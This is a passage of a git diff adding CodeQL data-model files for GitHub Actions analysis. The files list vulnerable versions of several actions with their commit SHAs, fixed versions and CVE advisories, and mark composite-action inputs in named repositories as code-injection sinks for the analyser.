["tj-actions/verify-changed-files", "v5.5", "cedd7096b7f23ae0307d7d82f516d666580579b3", "17"] + - ["tj-actions/verify-changed-files", "v5.4", "d68d3d232ffbba653ab0227d4bb2001cda681d12", "17"] + - ["tj-actions/verify-changed-files", "v5.3", "2e1153b8d1546dea7cd1a9db9834daceb72af17a", "17"] + - ["tj-actions/verify-changed-files", "v5.2", "c3dd6355e363eab778c129867f91da02e3285961", "17"] + - ["tj-actions/verify-changed-files", "v5.1", "81bd1de29366c53364b43cf83c4a4ddcab53b571", "17"] + - ["tj-actions/verify-changed-files", "v5", 
"31a9c7487cc1096253faa121489f4dbb32ca4132", "17"] + - ["tj-actions/verify-changed-files", "v4", "e981d37638f538ab477279c9f1fb6048462fd161", "17"] + - ["tj-actions/verify-changed-files", "v3.0.4", "e7f801cef44ca52e9aa496526dcd71daf5ef8437", "17"] + - ["tj-actions/verify-changed-files", "v3.0.3", "e86d0b9d1805c4e84fc90d4bcdab7371e14173d2", "17"] + - ["tj-actions/verify-changed-files", "v3.0.2", "ad255a4b81fa69c78f5fd1bb8ac95739dd3a9580", "17"] + - ["tj-actions/verify-changed-files", "v3.0.1", "3a8aed1f8847cc121e5f08e8963755154bb9df9e", "17"] + - ["tj-actions/verify-changed-files", "v3.0.gamma", "de910b5a2cdd6814c6e41d2b7c6f678eb75d430a", "17"] + - ["tj-actions/verify-changed-files", "v3.0.g", "d31b2a1fd119abbeddd18df3d95001a141b37372", "17"] + - ["tj-actions/verify-changed-files", "v3.0.beta", "e61c6fc5323423d2f0d9f04c7d15fa52af1084b0", "17"] + - ["tj-actions/verify-changed-files", "v3.0.b", "380890dc80695b7aa8047c0f824f87234defabd7", "17"] + - ["tj-actions/verify-changed-files", "v3.0.alpha", "873cfd676aea5e2a04b3f16706bd590effb5023e", "17"] + - ["tj-actions/verify-changed-files", "v3.0.a", "b0c60c86ab292cabeb4b4dc9f34c296c314fdfbb", "17"] + - ["tj-actions/verify-changed-files", "v3", "71831832d68f9fa5b527a9d692df35e1626ddfa2", "17"] + - ["tj-actions/verify-changed-files", "v2.0a", "6555389afba06cce81bc2f57a191d54f380ece0a", "17"] + - ["tj-actions/verify-changed-files", "v2", "9828a95864031bd113695ad5c68944163008d861", "17"] + - ["tj-actions/verify-changed-files", "v1.0.1", "8150cee7a747364d6b113cf8b0f59af88453a161", "17"] + - ["tj-actions/verify-changed-files", "v1", "48ddf88305af39076d425f86f0617d6f7ff23d58", "17"] + + # tj-actions/branch-names + # https://github.com/advisories/GHSA-8v8w-v8xg-79rf + # CVE-2023-49291 + - ["tj-actions/branch-names", "v7.0.6", "ab304d8562e2f137165e1d930e6d22d431189074", "7.07"] + - ["tj-actions/branch-names", "v7.0.5", "033f2358d95522973eee35810e35a86fae4a71d8", "7.07"] + - ["tj-actions/branch-names", "v7.0.4", 
"f7cfbc8edeb70a87ebec52e94fa8366f5077d0bc", "7.07"] + - ["tj-actions/branch-names", "v7.0.3", "309671a59e1143038c2a50f009b6adf301f6aa71", "7.07"] + - ["tj-actions/branch-names", "v7.0.2", "636cfe47b2002897ee4d3f07792c9fdd5d7dc725", "7.07"] + - ["tj-actions/branch-names", "v7.0.1", "4e532392367d7e4fb2f494f2d50c47562660cce5", "7.07"] + - ["tj-actions/branch-names", "v7.0.0", "604fda4f4254216e3b564d60fe27d68017756558", "7.07"] + - ["tj-actions/branch-names", "v6.5", "2e5354c6733793113f416314375826df030ada23", "7.07"] + - ["tj-actions/branch-names", "v6.4", "eee8675bd61ec38bcfbfedd504d8473292ba649e", "7.07"] + - ["tj-actions/branch-names", "v6.3", "a594c1e96eab7790611fdaf5bc8f76ea55cedabd", "7.07"] + - ["tj-actions/branch-names", "v6.2", "b90df97be1c548ac9c8bd9186bfea6747153bf5e", "7.07"] + - ["tj-actions/branch-names", "v6.1", "09ab61130975078eb7cde103fe8d2ae1649a1853", "7.07"] + - ["tj-actions/branch-names", "v6", "2e5354c6733793113f416314375826df030ada23", "7.07"] + - ["tj-actions/branch-names", "v5.6", "63b65253bc9542d36a60646299bd8c9af6d9ce7e", "7.07"] + - ["tj-actions/branch-names", "v5.5", "a704b89383028b5df2a4fd0b9fac9711970f18be", "7.07"] + - ["tj-actions/branch-names", "v5.4", "b0f914ba0e7aa1e243b53df97447f71eb57da09a", "7.07"] + - ["tj-actions/branch-names", "v5.3", "e0e3be64a3f10f671bb526b715f86a8a834dce75", "7.07"] + - ["tj-actions/branch-names", "v5.2", "9cd06d955f4184031cd71fbb1717ac268ade2ee0", "7.07"] + - ["tj-actions/branch-names", "v5.1", "b99758d88d96a27ee98b444451c1602a4507d243", "7.07"] + - ["tj-actions/branch-names", "v5", "dc2e78ac9284175fdc0f2d505d8b49ef99632ea8", "7.07"] + - ["tj-actions/branch-names", "v4.9", "12c1d475292ae9bb96656e80c24172db3cd60ffb", "7.07"] + - ["tj-actions/branch-names", "v4.8", "af5c6741e639608a1c0e87eaa3c0c414d427d9e4", "7.07"] + - ["tj-actions/branch-names", "v4.7", "28a6a95bc5bcc69b16010647668f1c5c4fd0dcca", "7.07"] + - ["tj-actions/branch-names", "v4.6", "b0fc3aebc2f3fb8edfd024aea4dc8a073d10db88", "7.07"] + - 
["tj-actions/branch-names", "v4.5", "a0061fbc59329b02d6c530f25b9d3fc80340a792", "7.07"] + - ["tj-actions/branch-names", "v4.4", "ce1737e426445fcb5b05a09e984b66d0b27548ba", "7.07"] + - ["tj-actions/branch-names", "v4.3", "47910e48331f8d64a4d535a35e9540c1ebf767f7", "7.07"] + - ["tj-actions/branch-names", "v4.2", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"] + - ["tj-actions/branch-names", "v4.1", "98c04d51ee204c4f23daee8ee15af9e8e80e36b2", "7.07"] + - ["tj-actions/branch-names", "v4", "f107226331b387d31308ceb1b5767b52024508e8", "7.07"] + - ["tj-actions/branch-names", "v3.6", "3e0215fc2dd14b3e395f99b5e2cc1e4d93afe1b6", "7.07"] + - ["tj-actions/branch-names", "v3.5", "b587231a9abec0da6f45dbaea42d88a9c130ee8f", "7.07"] + - ["tj-actions/branch-names", "v3.4", "dd9939e9966a18c8ce9bfcf188731c4746faf197", "7.07"] + - ["tj-actions/branch-names", "v3.3", "509c3124abef4caaeb784a5aa6f465da588e0c43", "7.07"] + - ["tj-actions/branch-names", "v3.2", "ae7cf1163ab1375b4bbf5ec6d16a686118dac27d", "7.07"] + - ["tj-actions/branch-names", "v3.1", "eb14b2dffd7af08b599b691d72b757ae607675bd", "7.07"] + - ["tj-actions/branch-names", "v3", "fdb3a42221b1ee981def2a3e7767bd3ffcda0ff7", "7.07"] + - ["tj-actions/branch-names", "v2.2", "4362da73333d3a6ecf81047f6ae055cad78fcb38", "7.07"] + - ["tj-actions/branch-names", "v2.1", "8c72ffde4df03225c479f93fef608d8cdd1042f3", "7.07"] + - ["tj-actions/branch-names", "v2", "8307330ac59a26bd125a6f99c33820dd0baf439f", "7.07"] + - ["tj-actions/branch-names", "v1", "549ca323b2179ffc0f7f828b555e88fe53da3787", "7.07"] + + # gradle/gradle-build-action + # https://github.com/advisories/GHSA-h3qr-39j9-4r5v + # CVE-2023-30853 + - ["gradle/gradle-build-action", "v2.4.1", "5056fa9d50478a14af3c9925c12ca02318659d3e", "2.4.2"] + - ["gradle/gradle-build-action", "v2.4.0", "6095a76664413da4c8c134ee32e8a8ae900f0f1f", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.3", "3fbe033aaae657f011f88f29be9e65ed26bd29ef", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.2", 
"fd32ae908111fe31afa48827bd1ee909540aa971", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.1", "c295a4096e1d2c453eaf1f65c6f96686e26bd8be", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.0", "356abb47e7664b5505e25d7997a5a522a17c62d9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.0-beta.1", "d427a379a8cc30e1c773080ce783e7e6d5167584", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.5", "cd579d970f8aec1cf0cae5f62a8e418768970015", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.4", "bf2a15ee94874758c21b91220b4d0ab84f762423", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.3", "9411346324b44f5402cbef3ac5a83a411086aa9a", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.2", "cd3cedc781988c804f626f4cd2dc51d0bdf02a12", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.1", "67421db6bd0bf253fb4bd25b31ebb98943c375e1", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0", "e88ed3e650b26bd116cfee53cf198c1f6856682d", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-rc.2", "de51428ba55149e7c6f6957a566b8759efd425de", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-rc.1", "63bcd47c1be270a660a151ce2b7848b8730f06ef", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-beta.1", "26ea4afa082ddf7e3e5bcf6d12283111b6f3f837", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.7", "9b814496b50909128c6a52622b416c5ffa04db49", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.6", "116ac10f8131939c7e405884cb2456067b0479e9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.5", "fec4a42eb0c83154e5c9590748ba8337949c5701", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.4", "0d13054264b0bb894ded474f08ebb30921341cee", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.3", "937999e9cc2425eddc7fd62d1053baf041147db7", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.2", "bc3340afc5e3cc44f2321809ac090d731c13c514", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.1", "b9c806c75d3cb8998f905077e62bb670e7fa7e02", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.0", 
"3edb3cb004617998d8cf56fe2ebf9d59602e713e", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0.1", "996094e8e808208e5738e8413b3f55d24d1c1eb7", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0.0", "4137be6a8bf7d7133955359dbd952c0ca73b1021", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.3", "4e899835b3bddb7d01d3a988e6c53d67ec8a76e2", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.2", "2a57ddf74a257b005f65f70cbf15e8e7f06292d9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.1", "db2b34260fe57577fec47305e78a20755eef0441", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.7", "cba1833ddecbbee649950c284416981928631008", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.6", "a94b9252d5d8ca83eed3f76a856f2ba046b1b3c6", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.5", "263f84178a82449371326ba2c1d781bc4b4bb9ac", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.4", "29894757f3fd1d4752e4efadb74896d39873a0ae", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.3", "c000a0b58fe0ad402c613a864ea3ed26d6e88fd0", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.2", "21dee7159020ab3140bebfd2280a6f34ef4e08ae", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.1", "bebb162342333983b660d21f31c90f33950f5023", "2.4.2"] + - ["gradle/gradle-build-action", "v1.5.1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"] + - ["gradle/gradle-build-action", "v1.5.0", "e0c2736e35d366e96bb202d1af817db9d562da2f", "2.4.2"] + - ["gradle/gradle-build-action", "v1.4.1", "3f3947669a3fe6883ed8dab14671bdc6042ec2d9", "2.4.2"] + - ["gradle/gradle-build-action", "v1.4.0", "579711fd3cd8691fbc0cab64db65e9c1e586658e", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.3", "90ccf054e6b9905f30f98c938bce4c6acd323b6b", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.2", "c6b57b9c8c4f72268b10f151623ce6a2855c6387", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.1", "791b98c5656178712736d390e91be71eadfe192e", "2.4.2"] + - ["gradle/gradle-build-action", 
"v1.3.0", "27da3e28b3c4cc84c9e7965dc2371f969e582049", "2.4.2"] + - ["gradle/gradle-build-action", "v1.2.1", "e220e54c83b8f1a546d8e6d598490231fe2bf64b", "2.4.2"] + - ["gradle/gradle-build-action", "v1.2.0", "720051268d4728af6b7e0defa8ed8097b20ef218", "2.4.2"] + - ["gradle/gradle-build-action", "v1.1.0", "d0c5f7955e911444399df5d044916a49bdccff00", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.2", "064f85c1568a6fd57b32d8f98c0dc9f237c59156", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.1", "6170f06e8dd334a7f6879781c2ed4889c4cc76bf", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.0", "2d5ca45eab01ff2ce82777ab670ff2bd5d8cf8d5", "2.4.2"] + - ["gradle/gradle-build-action", "v1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"] + + # rlespinasse/github-slug-action + # https://github.com/advisories/GHSA-6q4m-7476-932w + # CVE-2023-27581 + - ["rlespinasse/github-slug-action", "v4.4.1", "102b1a064a9b145e56556e22b18b19c624538d94", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.4.0", "a362e5fb42057a3a23a62218b050838f1bacca5d", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.2", "b011e83cf8cb29e22dda828db30586691ae164e4", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.1", "00198f89920d4454e37e4b27af2b7a8eba79c530", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.0", "9c3571fd3dba541bfdaebc001482a49a1c1f136a", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.9.0", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.8.0", "4a00c29bc1c0a737315b4200af6c6991bb4ace18", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.7.1", "5150a26d43ce06608443c66efea46fc6f3c50d38", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.7.0", "ebfc49c0e9cd081acb7ba0634d8d6a711b4c73cf", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - 
["rlespinasse/github-slug-action", "v3.x", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v2.x", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"] + - ["rlespinasse/github-slug-action", "v1.1.x", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.4", "33cd7a701db9c2baf4ad705d930ade51a9f25c14", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.3", "1615fcb48b5315152b3733b7bed1a9f5dfada6e3", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.2", "4177734b38a3d59604747bf47e537ccb6bcb9cdf", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.1", "7a3b4c1766ad8e6d23ab37d33417392509ff84e2", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.0", "dbbe21b72b96929fe6e67275c332f43599b31274", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.1.0", "88f3ee8f6f5d1955de92f1fe2fdb301fd40207c6", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.0.1", "cd9871b66e11e9562e3f72469772fe100be4c95a", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.0.0", "bd31a9f564f7930eea1ecfc8d0e6aebc4bc3279f", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.6.1", "1bf76b7bc6ef7dc6ba597ff790f956d9082479d7", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.6.0", "172fe43594a58b5938e248ec757ada60cdb17e18", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.5.1", "016823880d193a56b180527cf7ee52f13c3cfe33", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.5.0", "4060fda2690bcebaabcd86db4fbc8e1c2817c835", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.4.0", "0c099abd978b382cb650281af13913c1905fdd50", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.3.0", "d1880ea5b39f611effb9f3f83f4d35bff34083a6", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.2.0", "c8d8ee50d00177c1e80dd57905fc61f81e437279", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.1.0", 
"e4699e49fcf890a3172a02c56ba78d867dbb9fd5", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.0.0", "6a873bec5ac11c6d2a11756b8763356da63a8939", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.2.0", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.1.1", "72cfc4cb1f36c102c48541cb59511a6267e89c95", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.1.0", "1172ed1802078eb665a55c252fc180138b907c51", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.0.0", "ca9a67fa1f1126b377a9d80dc1ea354284c71d21", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.2.0", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.1.1", "242e04c2d28ac5db296e5d8203dfd7dc6bcc17a9", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.1.0", "881085bcae8c3443a89cc9401f3e1c60fb014ed2", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.2", "a35a1a486a260cfd99c5b6f8c6034a2929ba9b3f", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.1", "e46186066296e23235242d0877e2b4fe54003d54", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.0", "9671420482a6e4c59c06f2d2d9e0605e941b1287", "4.4.1"] + + # Azure/setup-kubectl + # https://github.com/advisories/GHSA-p756-rfxh-x63h + # CVE-2023-23939 + - ["Azure/setup-kubectl", "v2.1", "6025c840858f1afa584a5190a4426c338f59e503", "3"] + - ["Azure/setup-kubectl", "v2.0", "7ad2aa66bb42774adf65a0c580fbc96b2dadd747", "3"] + - ["Azure/setup-kubectl", "v1", "a625ca209b0faaa8871dac8fb5f50ee4b4d22622", "3"] + + # gajira-create + # https://github.com/advisories/GHSA-4xqx-pqpj-9fqw + # CVE-2020-14188 + - ["atlassian/gajira-create", "v2.0.0", "77d13eab156b8ad1c08c0655011b8a442c502998", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.3", "14c3d657c383981ee595d9750f68d7e4e77d64d0", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.1", "2cd32e0738e2b31717e7119717fed83e482d2a36", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.0", "f11e88bf4a1358e741ac282bc198a4f21cb719a1", "2.0.1"] + + # 
hashicorp/vault-action
+ # https://github.com/advisories/GHSA-4mgv-m5cm-f9h7
+ # CVE-2021-32074
+ - ["hashicorp/vault-action", "v2.1.2", "5e5c06a3c8e96b7c4757fe7a10e03469cdbd07bb", "2.2.0"]
+ - ["hashicorp/vault-action", "v2.1.1", "2fb78ab91e55be5479aacf74f7b451eab79773a4", "2.2.0"]
+ - ["hashicorp/vault-action", "v2.1.0", "2ca76a4465bca4f71fc88320e67551a287f7eaec", "2.2.0"]
+ - ["hashicorp/vault-action", "v2.0.1", "952d5d48e4448ad364651cc473aeccc25bd169d9", "2.2.0"]
+ - ["hashicorp/vault-action", "v2.0.0", "e27b45646f82a319c8157e545e24b7588510a397", "2.2.0"]
+ - ["hashicorp/vault-action", "v1.0.1", "22e3f3e09e3baba4d6cc62823175d21fafe4e30a", "2.2.0"]
+ - ["hashicorp/vault-action", "v1.0.0", "727494f451d57cbfc932a1d8bce1b0a027d99a8b", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.10.2", "9878eba70ad6c6e21a01bd1e2debd3f3b7cbc46e", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.10.1", "567ec72c33597ee9feca8bed4611a8ace38330c2", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.10.0", "5c464962be8937589f883cf209d21b3982c92360", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.9.0", "50ece41861b565239528923369690fc43cc0050b", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.8.0", "4ab6f6070f5be6702101c9736961beb8105e8708", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.7.0", "4edbc9a77a84bd34b0da2e8b8d527871b6103aae", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.6.2", "7d1d7d26adb265e6ebc6018ce2b92be7c5a7c63c", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.6.1", "f9753d75ef0cdafe621cda2323b5dcc4d673d01a", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.6.0", "0188d9d223dac8b24b94b04d3253bf0fe0365ca7", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.5.0", "f229481670b4719a05f01e8fd8478c191a373c43", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.4.0", "3b9239de79207bf3fba80a16916f257918ab1d15", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.3.1", "ab4dc55b2ecc6eb5926c5caffa45eaf0c3ad735a", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.3.0", "3747195c5f2848179bf615690b3e66e69a5e4dc7", "2.2.0"]
+ -
["hashicorp/vault-action", "v0.2.2", "da9a93f3f5bec24febf304139a6cbe61f0f8ad5e", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.1", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.0", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.1.0", "19c0b21a1ddb75543178ac4a250b5b7cff7fd55a", "2.2.0"] + + # check-spelling/check-spelling + # https://github.com/advisories/GHSA-g86g-chm8-7r2p + # CVE-2021-32724 + - ["check-spelling/check-spelling", "v0.0.18", "08f08a6ff6b9ebae06cb8fe463374a8a5a37e03c", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.17-alpha", "ead83f4596b4aac06f698b501b5beb3218f6214d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.16-alpha", "5f7f35b25e6bce7b1e5a8f226369a86ab19a623e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.15-alpha", "d8f2d9ec30e38ffae03410088062714ac04c36cd", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.14-alpha", "67ea89eaff703694453dbfd346c4c31dfab646fc", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.13-alpha", "a9db57b850b66cb664373f19f6628c4ee39fbcb5", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.12-alpha", "22b3d11338aea9482eda87725ab15b8862de4061", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.11-alpha", "10d8401e72f7b4752a765b61ecbd1539394d6f4e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.10-alpha", "c79ba85e2b8e45ef0a8da9eb0d16e7f2135ad2c6", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.9-alpha", "13d6bbcc0a082113d1c2d33ea41fcbe915e62de9", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.8-alpha", "6505ab5f1ebbe080fc072ea3cf68bac289f419ac", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.7-alpha", "a27e3104c5c8d69c2986d22c938e679ec0f1b2c7", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.6-alpha", "8a7dfc447cd58195531f7c313f6ff693f0e2eb89", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.5-alpha", "e584b835f290270af78538013634f348d6cc7398", "0.0.19"] + - 
["check-spelling/check-spelling", "0.0.4-alpha", "cb465b08587798aa788dfd9bc345c2c982ac9e29", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.3-alpha", "b8e280ae90b28f1aadc50f93073aa6450afe820d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.2-alpha", "8e32de8a016bc4dce4170ec36881cbb315f94ff4", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.1-alpha", "d2d0ee06c72600982d2f80bca187ce90fee6ad94", "0.0.19"] diff --git a/actions/ql/lib/ext/config/workflow_runtime_data.yml b/actions/ql/lib/ext/config/workflow_runtime_data.yml new file mode 100644 index 000000000000..f02a6bc20aa2 --- /dev/null +++ b/actions/ql/lib/ext/config/workflow_runtime_data.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: repositoryDataModel + data: [] + - addsTo: + pack: codeql/actions-all + extensible: workflowDataModel + data: [] diff --git a/actions/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/actions/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml new file mode 100644 index 000000000000..ba6dbbe91e62 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-controller-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.repo-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.repo-owner", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.workflow-file", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.auth-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/actions/ql/lib/ext/generated/composite-actions/adap_flower.model.yml new file mode 100644 index 000000000000..b3430655e014 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.pip-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml new file mode 100644 index 000000000000..3c6e8718fb42 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.ignore-endo-branch", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.codecov-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.datadog-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.datadog-site", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/actions/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml new file mode 100644 index 000000000000..fee02f3d3bde --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/actions/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml new file mode 100644 index 000000000000..c102a42d3ea8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] + - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml new file mode 100644 index 000000000000..77744b4ab474 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] + - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", 